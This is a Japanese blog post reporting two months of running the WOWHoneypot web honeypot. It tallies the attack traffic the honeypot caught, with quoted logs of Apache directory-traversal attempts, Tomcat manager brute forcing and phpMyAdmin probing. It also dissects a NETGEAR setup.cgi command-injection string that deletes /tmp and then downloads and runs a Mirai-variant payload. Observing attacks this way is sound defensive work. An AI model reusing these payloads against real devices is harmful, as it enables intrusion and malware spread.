WOWHoneypotを運用して2ヶ月たったのでまとめ
Honeypotとは
Welcome to Omotenashi Web Honeypotの略
攻撃者をもてなし、サイバー攻撃を観察できるハニーポット
github.com
WOWHoenypotの特徴
主な仕組み
-
デフォルト200 OK
400系のエラーコードを返すと、攻撃者は通信を止めてしまうため、取れる情報が少ない→ 200 OKを返すことで、攻撃対象が存在すると誤認させる -
マッチ&レスポンス
特定の通信に対して、特定の応答をするシグネチャを定義しておくことでハニーポットだと気づかれにくくする
→(例:URIにwp-login.phpという文字列が含まれていたら、WordPressのログインページを装う)
WOWHoenypotの応答の様子
やったこと
- WOWHoneypotを外部IPアドレスの80番ポート(*)で公開
(*)実際には権限の少ないユーザ権限を使い8080ポートで動作させ、80→8080へ転送 - HTTPリクエストをログファイルに保存
集計期間 2ヶ月 (2023 07.18-09.17) - ログを集計・分析
合計アクセス数は19305回
結果
リクエストメソッドごとの観測回数
思ったこと
GETとPOSTは多いのは当たり前として、CONNECTとHEADが多いのが気になる
CONNECTメソッドの観測理由
踏み台にするプロキシサーバを探索している
HEADメソッドの観測理由
ログ
HEAD /icons/sphere1.png
HEAD /icons/.%%32%65/.%%32%65/apache2/icons/sphere1.png HEAD /icons/.%2e/%2e%2e/apache2/icons/sphere1.png
Apacheのiconsフォルダへのディレクトリトラバーサル攻撃などが主な原因
アクセスURLごとの観測回数
観測回数の多かったアクセスログ①
Headerのみを変えた /manager/htmlへのGET
ログ
GET /manager/html HTTP/1.1
(*) ユーザ名:パスワード , Base64でデコード済
上記アクセスは約53秒に140回
→Tomcatの管理サーバへの侵入を試みたブルートフォース攻撃を仕掛けている
気になった攻撃ログ「GET /manager/html HTTP/1.1」 - まいほびー
観測回数の多かったアクセスログ②
phpMyAdminの脆弱性を利用した攻撃
phpMyAdminとは:PHPで実装されたMySQL管理のためのWebアプリケーション
ログ
GET http://*.*.*.*/phpMyAdmin/scripts/setup.php
GET http://*.*.*.*/phpMyadmin/scripts/setup.php
GET http://*.*.*.*/myAdmin/scripts/setup.php
GET http://*.*.*.*/MyAdmin/scripts/setup.php
GET http://*.*.*.*/SQL/scripts/setup.php
phpMyAdminを狙った攻撃を深追いしてみた - こんとろーるしーこんとろーるぶい
→探索により対象の存在を確認した上で、外部のFTPサーバから不正なPHPを実行しようとしている
観測回数の多かったアクセスログ③
ネットワーク機器を狙ったOSコマンドインジェクション
ログ
GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://*.*.*.*/
Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1
- /setup.cgi? の部分
実行するスクリプト名を定義している - next_file=netgear.cfg& の部分
NETGEAR社のNW機器の設定ファイルを狙った攻撃だとわかる
- todo=syscmd&cmd=rm+-rf+/tmp/*; の部分
wget+http://*.*.*.*/Mozi.m+-O+/tmp/netgear;の部分
特定のURLからMozi.m(*)というファイルをダウンロードし/tmp/netgearとして保存しようとしている
-
sh+netgear&curpath=/¤tsetting.htm=1の部分
ダウンロードしたファイルをシェルスクリプトとして実行させようとしている
(*) マルウェア「Mirai」の亜種
→ ハードウェア (OS) に対して、マルウェアをダウンロードさせコマンド実行させようとしている
